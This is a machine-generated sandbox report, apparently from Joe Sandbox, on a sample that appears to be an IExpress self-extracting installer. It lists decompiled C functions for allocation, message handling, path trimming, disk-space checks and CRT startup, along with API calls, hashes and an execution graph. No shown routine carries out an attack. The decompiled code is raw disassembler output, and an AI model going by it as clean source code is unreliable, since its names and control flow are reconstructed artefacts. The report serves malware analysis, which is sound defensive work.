                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0038647A
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 003863EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                • API String ID: 1065093856-1193786559
                                                • Opcode ID: 03120dcbe7399b527d3b0ff85a6d86c0c41e7e4714708a72a7beec77e9cf300c
                                                • Instruction ID: 88d4f8f46baa6f91de6a6a20b91e9c1167486ea88c75129ef5df8b519ef786aa
                                                • Opcode Fuzzy Hash: 03120dcbe7399b527d3b0ff85a6d86c0c41e7e4714708a72a7beec77e9cf300c
                                                • Instruction Fuzzy Hash: 172181B1A00318ABDB12EF65DC86FEA776CEB45314F1041EAA585A7180DAB05D858F64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E003847E0(intOrPtr* __ecx) {
                                                				intOrPtr _t6;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t19;
                                                				intOrPtr* _t22;
                                                				void _t24;
                                                				struct HWND__* _t25;
                                                				struct HWND__* _t26;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                				intOrPtr* _t33;
                                                				void* _t34;
                                                
                                                				_t33 = __ecx;
                                                				_t34 = LocalAlloc(0x40, 8);
                                                				if(_t34 != 0) {
                                                					_t22 = _t33;
                                                					_t27 = _t22 + 1;
                                                					do {
                                                						_t6 =  *_t22;
                                                						_t22 = _t22 + 1;
                                                					} while (_t6 != 0);
                                                					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                					 *_t34 = _t24;
                                                					if(_t24 != 0) {
                                                						_t28 = _t33;
                                                						_t19 = _t28 + 1;
                                                						do {
                                                							_t9 =  *_t28;
                                                							_t28 = _t28 + 1;
                                                						} while (_t9 != 0);
                                                						E00381680(_t24, _t28 - _t19 + 1, _t33);
                                                						_t11 =  *0x3891e0; // 0x2cf8298
                                                						 *(_t34 + 4) = _t11;
                                                						 *0x3891e0 = _t34;
                                                						return 1;
                                                					}
                                                					_t25 =  *0x388584; // 0x0
                                                					E003844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                					LocalFree(_t34);
                                                					L2:
                                                					return 0;
                                                				}
                                                				_t26 =  *0x388584; // 0x0
                                                				E003844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                				goto L2;
                                                			}















                                                0x003847e8
                                                0x003847f0
                                                0x003847f4
                                                0x0038480f
                                                0x00384811
                                                0x00384814
                                                0x00384814
                                                0x00384816
                                                0x00384817
                                                0x00384829
                                                0x0038482b
                                                0x0038482f
                                                0x0038484f
                                                0x00384852
                                                0x00384855
                                                0x00384855
                                                0x00384857
                                                0x00384858
                                                0x00384860
                                                0x00384865
                                                0x0038486a
                                                0x0038486f
                                                0x00000000
                                                0x00384876
                                                0x00384831
                                                0x00384841
                                                0x00384847
                                                0x0038480b
                                                0x00000000
                                                0x0038480b
                                                0x003847f6
                                                0x00384806
                                                0x00000000

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00384E6F), ref: 003847EA
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00384823
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00384847
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00384851
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                • API String ID: 359063898-1193786559
                                                • Opcode ID: 54e5b9b81cfb437989f9982a68c28571da3866cd96822b51ce65a31a37e79e33
                                                • Instruction ID: 9df3ea8020954eb7c9d49fe05ba27be236577fcd67006fa2634a1d3e62edbd80
                                                • Opcode Fuzzy Hash: 54e5b9b81cfb437989f9982a68c28571da3866cd96822b51ce65a31a37e79e33
                                                • Instruction Fuzzy Hash: D8112975204742AFE717AF249C18F773B5EEB85700F0585D9F9828BB41DA368C068760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00383680(void* __ecx) {
                                                				void* _v8;
                                                				struct tagMSG _v36;
                                                				int _t8;
                                                				struct HWND__* _t16;
                                                
                                                				_v8 = __ecx;
                                                				_t16 = 0;
                                                				while(1) {
                                                					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                					if(_t8 == 0) {
                                                						break;
                                                					}
                                                					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                						continue;
                                                					} else {
                                                						do {
                                                							if(_v36.message != 0x12) {
                                                								DispatchMessageA( &_v36);
                                                							} else {
                                                								_t16 = 1;
                                                							}
                                                							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                						} while (_t8 != 0);
                                                						if(_t16 == 0) {
                                                							continue;
                                                						}
                                                					}
                                                					break;
                                                				}
                                                				return _t8;
                                                			}







                                                0x0038368c
                                                0x0038368f
                                                0x00383691
                                                0x0038369f
                                                0x003836a7
                                                0x00000000
                                                0x00000000
                                                0x003836ba
                                                0x00000000
                                                0x003836bc
                                                0x003836bc
                                                0x003836c0
                                                0x003836cb
                                                0x003836c2
                                                0x003836c4
                                                0x003836c4
                                                0x003836da
                                                0x003836e0
                                                0x003836e6
                                                0x00000000
                                                0x00000000
                                                0x003836e6
                                                0x00000000
                                                0x003836ba
                                                0x003836ed

                                                APIs
                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0038369F
                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003836B2
                                                • DispatchMessageA.USER32(?), ref: 003836CB
                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003836DA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                • String ID:
                                                • API String ID: 2776232527-0
                                                • Opcode ID: e9dc3d958ea73bdc558b6eca5f6a9b3e0dd6eabf566381b4f4832e404ab80c68
                                                • Instruction ID: 61dd5aa24dde92bdfe33b4aa1fdc298a4c65c9fe757570bdc03d920e48673445
                                                • Opcode Fuzzy Hash: e9dc3d958ea73bdc558b6eca5f6a9b3e0dd6eabf566381b4f4832e404ab80c68
                                                • Instruction Fuzzy Hash: C101847290031477DB315AAA9C8CEEB767CEB85F10F11019ABA05E2380E5618640C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E003865E8(char* __ecx) {
                                                				char _t3;
                                                				char _t10;
                                                				char* _t12;
                                                				char* _t14;
                                                				char* _t15;
                                                				CHAR* _t16;
                                                
                                                				_t12 = __ecx;
                                                				_t15 = __ecx;
                                                				_t14 =  &(__ecx[1]);
                                                				_t10 = 0;
                                                				do {
                                                					_t3 =  *_t12;
                                                					_t12 =  &(_t12[1]);
                                                				} while (_t3 != 0);
                                                				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                				while(1) {
                                                					_t16 = CharPrevA(_t15, ??);
                                                					if(_t16 <= _t15) {
                                                						break;
                                                					}
                                                					if( *_t16 == 0x5c) {
                                                						L7:
                                                						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                							_t16 = CharNextA(_t16);
                                                						}
                                                						 *_t16 = _t10;
                                                						_t10 = 1;
                                                					} else {
                                                						_push(_t16);
                                                						continue;
                                                					}
                                                					L11:
                                                					return _t10;
                                                				}
                                                				if( *_t16 == 0x5c) {
                                                					goto L7;
                                                				}
                                                				goto L11;
                                                			}









                                                0x003865e8
                                                0x003865ed
                                                0x003865ef
                                                0x003865f2
                                                0x003865f4
                                                0x003865f4
                                                0x003865f6
                                                0x003865f7
                                                0x00386608
                                                0x00386611
                                                0x00386618
                                                0x0038661c
                                                0x00000000
                                                0x00000000
                                                0x0038660e
                                                0x00386623
                                                0x00386625
                                                0x0038663b
                                                0x0038663b
                                                0x0038663d
                                                0x00386641
                                                0x00386610
                                                0x00386610
                                                0x00000000
                                                0x00386610
                                                0x00386644
                                                0x00386647
                                                0x00386647
                                                0x00386621
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00382B33), ref: 00386602
                                                • CharPrevA.USER32(?,00000000), ref: 00386612
                                                • CharPrevA.USER32(?,00000000), ref: 00386629
                                                • CharNextA.USER32(00000000), ref: 00386635
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Char$Prev$Next
                                                • String ID:
                                                • API String ID: 3260447230-0
                                                • Opcode ID: 53cb6e6e3bd5529bca2680eddc0a9250b1ad0cb7830316ff16bd8d94427c0bf9
                                                • Instruction ID: 31453a8e776b84f99e84a73d7df531ed1d973d8f440186e2723b29743ee8e87d
                                                • Opcode Fuzzy Hash: 53cb6e6e3bd5529bca2680eddc0a9250b1ad0cb7830316ff16bd8d94427c0bf9
                                                • Instruction Fuzzy Hash: 37F0F9310047906EEB332B288CCC8B7AF9CCFC7354F1A01EFE49192001E6150D068761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E003869B0() {
                                                				intOrPtr* _t4;
                                                				intOrPtr* _t5;
                                                				void* _t6;
                                                				intOrPtr _t11;
                                                				intOrPtr _t12;
                                                
                                                				 *0x3881f8 = E00386C70();
                                                				__set_app_type(E00386FBE(2));
                                                				 *0x3888a4 =  *0x3888a4 | 0xffffffff;
                                                				 *0x3888a8 =  *0x3888a8 | 0xffffffff;
                                                				_t4 = __p__fmode();
                                                				_t11 =  *0x388528; // 0x0
                                                				 *_t4 = _t11;
                                                				_t5 = __p__commode();
                                                				_t12 =  *0x38851c; // 0x0
                                                				 *_t5 = _t12;
                                                				_t6 = E00387000();
                                                				if( *0x388000 == 0) {
                                                					__setusermatherr(E00387000);
                                                				}
                                                				E003871EF(_t6);
                                                				return 0;
                                                			}








                                                0x003869b7
                                                0x003869c2
                                                0x003869c8
                                                0x003869cf
                                                0x003869d8
                                                0x003869de
                                                0x003869e4
                                                0x003869e6
                                                0x003869ec
                                                0x003869f2
                                                0x003869f4
                                                0x00386a00
                                                0x00386a07
                                                0x00386a0d
                                                0x00386a0e
                                                0x00386a15

                                                APIs
                                                  • Part of subcall function 00386FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00386FC5
                                                • __set_app_type.MSVCRT ref: 003869C2
                                                • __p__fmode.MSVCRT ref: 003869D8
                                                • __p__commode.MSVCRT ref: 003869E6
                                                • __setusermatherr.MSVCRT ref: 00386A07
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                • String ID:
                                                • API String ID: 1632413811-0
                                                • Opcode ID: 79dc307951a65a67303a901688f1fe964a564aeccb9e972824db6e590939c6d7
                                                • Instruction ID: 8414cb35fea0b9b89024fefacbb6ed0b14643b1cb59c97fbe50b83348fa28c2a
                                                • Opcode Fuzzy Hash: 79dc307951a65a67303a901688f1fe964a564aeccb9e972824db6e590939c6d7
                                                • Instruction Fuzzy Hash: 84F098B45097019FD76BBB34FD0E6143B69FB05331F600ADAE4618A2E1CF3A85458B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00386952(CHAR* __ecx) {
                                                				long _v8;
                                                				long _v12;
                                                				long _v16;
                                                				char _v20;
                                                				int _t22;
                                                
                                                				_t22 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_v20 = 0;
                                                				_v16 = 0;
                                                				if( *__ecx != 0) {
                                                					_t6 =  &_v20; // 0x385760
                                                					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                					}
                                                				}
                                                				return _t22;
                                                			}








                                                0x0038695b
                                                0x00386960
                                                0x00386963
                                                0x00386966
                                                0x00386969
                                                0x0038696c
                                                0x00386972
                                                0x00386987
                                                0x0038699f
                                                0x0038699f
                                                0x00386987
                                                0x003869a7

                                                APIs
                                                • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W8,?,00000000,00385760,?,A:\), ref: 0038697F
                                                • MulDiv.KERNEL32(?,?,00000400), ref: 00386999
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: DiskFreeSpace
                                                • String ID: `W8
                                                • API String ID: 1705453755-1785618751
                                                • Opcode ID: 6123bb8281f122b2a7f963a323e6ec1eb327d9151dd1341619904ad92e54aa61
                                                • Instruction ID: 557329d410bff614581257e422dc63b719dd7572d52a9235fabd3e0bdf58c4f0
                                                • Opcode Fuzzy Hash: 6123bb8281f122b2a7f963a323e6ec1eb327d9151dd1341619904ad92e54aa61
                                                • Instruction Fuzzy Hash: DAF097B6D10228BBDB12DFE88D45ADEBBBCEB48701F1541D6E610E6240D6719A058B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:28.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:959
                                                Total number of Limit Nodes:25
                                                execution_graph 3119 1066c03 3120 1066c17 _exit 3119->3120 3121 1066c1e 3119->3121 3120->3121 3122 1066c27 _cexit 3121->3122 3123 1066c32 3121->3123 3122->3123 2196 1066f40 SetUnhandledExceptionFilter 2197 1064cc0 GlobalFree 3124 1064200 3125 106421e 3124->3125 3126 106420b SendMessageA 3124->3126 3126->3125 3127 1063100 3128 10631b0 3127->3128 3130 1063111 3127->3130 3129 10631b9 SendDlgItemMessageA 3128->3129 3132 1063141 3128->3132 3129->3132 3133 106311d 3130->3133 3134 1063149 GetDesktopWindow 3130->3134 3131 1063138 EndDialog 3131->3132 3133->3131 3133->3132 3137 10643d0 6 API calls 3134->3137 3138 1064463 SetWindowPos 3137->3138 3140 1066ce0 4 API calls 3138->3140 3141 106315d 6 API calls 3140->3141 3141->3132 3142 1064bc0 3143 1064bd7 3142->3143 3144 1064c05 3142->3144 3144->3143 3145 1064c1b SetFilePointer 3144->3145 3145->3143 3146 10630c0 3147 10630de CallWindowProcA 3146->3147 3148 10630ce 3146->3148 3149 10630da 3147->3149 3148->3147 3148->3149 3150 10663c0 3151 1066407 3150->3151 3152 106658a CharPrevA 3151->3152 3153 1066415 CreateFileA 3152->3153 3154 1066448 WriteFile 3153->3154 3155 106643a 3153->3155 3156 1066465 CloseHandle 3154->3156 3158 1066ce0 4 API calls 3155->3158 3156->3155 3159 106648f 3158->3159 2198 1064ad0 2206 1063680 2198->2206 2201 1064aee WriteFile 2203 1064b14 2201->2203 2204 1064b0f 2201->2204 2202 1064ae9 2203->2204 2205 1064b3b SendDlgItemMessageA 2203->2205 2205->2204 2207 1063691 MsgWaitForMultipleObjects 2206->2207 2208 10636e8 2207->2208 2209 10636a9 PeekMessageA 2207->2209 2208->2201 2208->2202 2209->2207 2210 10636bc 2209->2210 2210->2207 2210->2208 2211 10636c7 DispatchMessageA 2210->2211 2212 10636d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 1064cd0 2214 1064cf4 2213->2214 2215 1064d0b 2213->2215 2216 1064d02 2214->2216 2217 1064b60 FindCloseChangeNotification 2214->2217 2215->2216 2219 1064dcb 2215->2219 2222 1064d25 2215->2222 2270 1066ce0 2216->2270 2217->2216 2220 1064dd4 SetDlgItemTextA 2219->2220 2223 1064de3 2219->2223 2220->2223 2221 1064e95 2222->2216 2236 1064c37 2222->2236 2223->2216 2244 106476d 2223->2244 2227 1064e38 2227->2216 2253 1064980 2227->2253 2232 1064e64 2261 10647e0 LocalAlloc 2232->2261 2235 1064e6f 2235->2216 2237 1064c4c DosDateTimeToFileTime 2236->2237 2239 1064c88 2236->2239 2238 1064c5e LocalFileTimeToFileTime 2237->2238 2237->2239 2238->2239 2240 1064c70 SetFileTime 2238->2240 2239->2216 2241 1064b60 2239->2241 2240->2239 2242 1064b92 FindCloseChangeNotification 2241->2242 2243 1064b76 SetFileAttributesA 2241->2243 2242->2243 2243->2216 2275 10666ae GetFileAttributesA 2244->2275 2246 106477b 2246->2227 2247 10647cc SetFileAttributesA 2249 10647db 2247->2249 2249->2227 2252 10647c2 2252->2247 2254 1064990 2253->2254 2255 10649a5 2254->2255 2256 10649c2 lstrcmpA 2254->2256 2257 10644b9 20 API calls 2255->2257 2258 1064a0e 2256->2258 2260 10649ba 2256->2260 2257->2260 2258->2260 2341 106487a 2258->2341 2260->2216 2260->2232 2262 10647f6 2261->2262 2263 106480f LocalAlloc 2261->2263 2264 10644b9 20 API calls 2262->2264 2266 106480b 2263->2266 2267 1064831 2263->2267 2264->2266 2266->2235 2268 10644b9 20 API calls 2267->2268 2269 1064846 LocalFree 2268->2269 2269->2266 2271 1066ceb 2270->2271 2272 1066ce8 2270->2272 2354 1066cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2271->2354 2272->2221 2274 1066e26 2274->2221 2276 1064777 2275->2276 2276->2246 2276->2247 2277 1066517 FindResourceA 2276->2277 2278 1066536 LoadResource 2277->2278 2279 106656b 2277->2279 2278->2279 2280 1066544 DialogBoxIndirectParamA FreeResource 2278->2280 2284 10644b9 2279->2284 2280->2279 2283 10647b1 2280->2283 2283->2247 2283->2249 2283->2252 2285 10644fe LoadStringA 2284->2285 2286 106455a 2284->2286 2287 1064527 2285->2287 2288 1064562 2285->2288 2290 1066ce0 4 API calls 2286->2290 2289 106681f 10 API calls 2287->2289 2294 10645c9 2288->2294 2299 106457e 2288->2299 2291 106452c 2289->2291 2292 1064689 2290->2292 2293 1064536 MessageBoxA 2291->2293 2325 10667c9 2291->2325 2292->2283 2293->2286 2296 1064607 LocalAlloc 2294->2296 2297 10645cd LocalAlloc 2294->2297 2296->2286 2309 10645c4 2296->2309 2297->2286 2302 10645f3 2297->2302 2299->2299 2301 1064596 LocalAlloc 2299->2301 2301->2286 2305 10645af 2301->2305 2306 106171e _vsnprintf 2302->2306 2303 106462d MessageBeep 2313 106681f 2303->2313 2331 106171e 2305->2331 2306->2309 2309->2303 2310 1064645 MessageBoxA LocalFree 2310->2286 2311 10667c9 EnumResourceLanguagesA 2311->2310 2314 1066857 GetVersionExA 2313->2314 2315 1066940 2313->2315 2318 106687c 2314->2318 2324 106691a 2314->2324 2316 1066ce0 4 API calls 2315->2316 2317 106463b 2316->2317 2317->2310 2317->2311 2319 10668a5 GetSystemMetrics 2318->2319 2318->2324 2320 10668b5 RegOpenKeyExA 2319->2320 2319->2324 2321 10668d6 RegQueryValueExA RegCloseKey 2320->2321 2320->2324 2322 106690c 2321->2322 2321->2324 2335 10666f9 2322->2335 2324->2315 2326 1066803 2325->2326 2327 10667e2 2325->2327 2326->2293 2339 1066793 EnumResourceLanguagesA 2327->2339 2329 10667f5 2329->2326 2340 1066793 EnumResourceLanguagesA 2329->2340 2332 106172d 2331->2332 2333 106173d _vsnprintf 2332->2333 2334 106175d 2332->2334 2333->2334 2334->2309 2336 106670f 2335->2336 2337 1066740 CharNextA 2336->2337 2338 106674b 2336->2338 2337->2336 2338->2324 2339->2329 2340->2326 2342 10648a2 CreateFileA 2341->2342 2344 1064908 2342->2344 2345 10648e9 2342->2345 2344->2260 2345->2344 2346 10648ee 2345->2346 2349 106490c 2346->2349 2350 10648f5 CreateFileA 2349->2350 2352 1064917 2349->2352 2350->2344 2351 1064962 CharNextA 2351->2352 2352->2350 2352->2351 2353 1064953 CreateDirectoryA 2352->2353 2353->2351 2354->2274 3160 1063210 3161 1063227 3160->3161 3183 106328e EndDialog 3160->3183 3162 1063235 3161->3162 3163 10633e2 GetDesktopWindow 3161->3163 3167 106324c 3162->3167 3168 10632dd GetDlgItemTextA 3162->3168 3176 1063239 3162->3176 3165 10643d0 11 API calls 3163->3165 3166 10633f1 SetWindowTextA SendDlgItemMessageA 3165->3166 3169 106341f GetDlgItem EnableWindow 3166->3169 3166->3176 3171 10632c5 EndDialog 3167->3171 3172 1063251 3167->3172 3170 10632fc 3168->3170 3193 1063366 3168->3193 3169->3176 3178 1063331 GetFileAttributesA 3170->3178 3170->3193 3171->3176 3173 106325c LoadStringA 3172->3173 3172->3176 3175 1063294 3173->3175 3185 106327b 3173->3185 3174 10644b9 20 API calls 3174->3176 3198 1064224 LoadLibraryA 3175->3198 3181 106333f 3178->3181 3182 106337c 3178->3182 3179 10644b9 20 API calls 3179->3183 3187 10644b9 20 API calls 3181->3187 3186 106658a CharPrevA 3182->3186 3183->3176 3184 10632a5 SetDlgItemTextA 3184->3176 3184->3185 3185->3179 3188 106338d 3186->3188 3189 1063351 3187->3189 3190 10658c8 27 API calls 3188->3190 3189->3176 3191 106335a CreateDirectoryA 3189->3191 3192 1063394 3190->3192 3191->3182 3191->3193 3192->3193 3194 10633a4 3192->3194 3193->3174 3195 10633c7 EndDialog 3194->3195 3196 106597d 34 API calls 3194->3196 3195->3176 3197 10633c3 3196->3197 3197->3176 3197->3195 3199 1064246 GetProcAddress 3198->3199 3200 10643b2 3198->3200 3201 10643a4 FreeLibrary 3199->3201 3202 106425d GetProcAddress 3199->3202 3204 10644b9 20 API calls 3200->3204 3201->3200 3202->3201 3203 1064274 GetProcAddress 3202->3203 3203->3201 3205 106428b 3203->3205 3206 106329d 3204->3206 3207 1064295 GetTempPathA 3205->3207 3212 10642e1 3205->3212 3206->3176 3206->3184 3208 10642ad 3207->3208 3208->3208 3209 10642b4 CharPrevA 3208->3209 3210 10642d0 CharPrevA 3209->3210 3209->3212 3210->3212 3211 1064390 FreeLibrary 3211->3206 3212->3211 3213 1064a50 3214 1064a9f ReadFile 3213->3214 3216 1064a66 3213->3216 3217 1064abb 3214->3217 3215 1064a82 memcpy 3215->3217 3216->3215 3216->3217 3218 1063450 3219 10634d3 EndDialog 3218->3219 3220 106345e 3218->3220 3221 106346a 3219->3221 3222 1063465 3220->3222 3223 106349a GetDesktopWindow 3220->3223 3222->3221 3226 106348c EndDialog 3222->3226 3224 10643d0 11 API calls 3223->3224 3225 10634ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3224->3225 3225->3221 3226->3221 2355 1064ca0 GlobalAlloc 2356 1066a60 2373 1067155 2356->2373 2358 1066a65 2359 1066a76 GetStartupInfoW 2358->2359 2360 1066a93 2359->2360 2361 1066aa8 2360->2361 2362 1066aaf Sleep 2360->2362 2363 1066ac7 _amsg_exit 2361->2363 2365 1066ad1 2361->2365 2362->2360 2363->2365 2364 1066b13 _initterm 2368 1066b2e __IsNonwritableInCurrentImage 2364->2368 2365->2364 2366 1066af4 2365->2366 2365->2368 2367 1066bd6 _ismbblead 2367->2368 2368->2367 2369 1066c1e 2368->2369 2372 1066bbe exit 2368->2372 2378 1062bfb GetVersion 2368->2378 2369->2366 2370 1066c27 _cexit 2369->2370 2370->2366 2372->2368 2374 106717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2374 2375 106717a 2373->2375 2377 10671cd 2374->2377 2375->2374 2376 10671e2 2375->2376 2376->2358 2377->2376 2379 1062c50 2378->2379 2380 1062c0f 2378->2380 2395 1062caa memset memset memset 2379->2395 2380->2379 2382 1062c13 GetModuleHandleW 2380->2382 2382->2379 2384 1062c22 GetProcAddress 2382->2384 2384->2379 2390 1062c34 2384->2390 2385 1062c8e 2387 1062c97 CloseHandle 2385->2387 2388 1062c9e 2385->2388 2387->2388 2388->2368 2390->2379 2393 1062c89 2489 1061f90 2393->2489 2506 106468f FindResourceA SizeofResource 2395->2506 2398 1062ef3 2400 10644b9 20 API calls 2398->2400 2399 1062d2d CreateEventA SetEvent 2401 106468f 7 API calls 2399->2401 2402 1062d6e 2400->2402 2403 1062d57 2401->2403 2407 1066ce0 4 API calls 2402->2407 2404 1062d5b 2403->2404 2406 1062e1f 2403->2406 2409 106468f 7 API calls 2403->2409 2405 10644b9 20 API calls 2404->2405 2405->2402 2511 1065c9e 2406->2511 2410 1062c62 2407->2410 2412 1062d9f 2409->2412 2410->2385 2436 1062f1d 2410->2436 2412->2404 2415 1062da3 CreateMutexA 2412->2415 2413 1062e30 2413->2398 2414 1062e3a 2416 1062e52 FindResourceA 2414->2416 2417 1062e43 2414->2417 2415->2406 2418 1062dbd GetLastError 2415->2418 2421 1062e64 LoadResource 2416->2421 2422 1062e6e 2416->2422 2537 1062390 2417->2537 2418->2406 2420 1062dca 2418->2420 2424 1062dd5 2420->2424 2425 1062dea 2420->2425 2421->2422 2423 1062e4d 2422->2423 2552 10636ee GetVersionExA 2422->2552 2423->2402 2426 10644b9 20 API calls 2424->2426 2427 10644b9 20 API calls 2425->2427 2429 1062de8 2426->2429 2430 1062dff 2427->2430 2431 1062e04 CloseHandle 2429->2431 2430->2406 2430->2431 2431->2402 2435 1066517 24 API calls 2435->2423 2437 1062f3f 2436->2437 2438 1062f6c 2436->2438 2440 1062f5f 2437->2440 2641 10651e5 2437->2641 2660 1065164 2438->2660 2788 1063a3f 2440->2788 2442 1062f71 2445 106303c 2442->2445 2673 10655a0 2442->2673 2449 1066ce0 4 API calls 2445->2449 2450 1062c6b 2449->2450 2476 10652b6 2450->2476 2451 1062f86 GetSystemDirectoryA 2452 106658a CharPrevA 2451->2452 2453 1062fab LoadLibraryA 2452->2453 2454 1062ff7 FreeLibrary 2453->2454 2455 1062fc0 GetProcAddress 2453->2455 2456 1063006 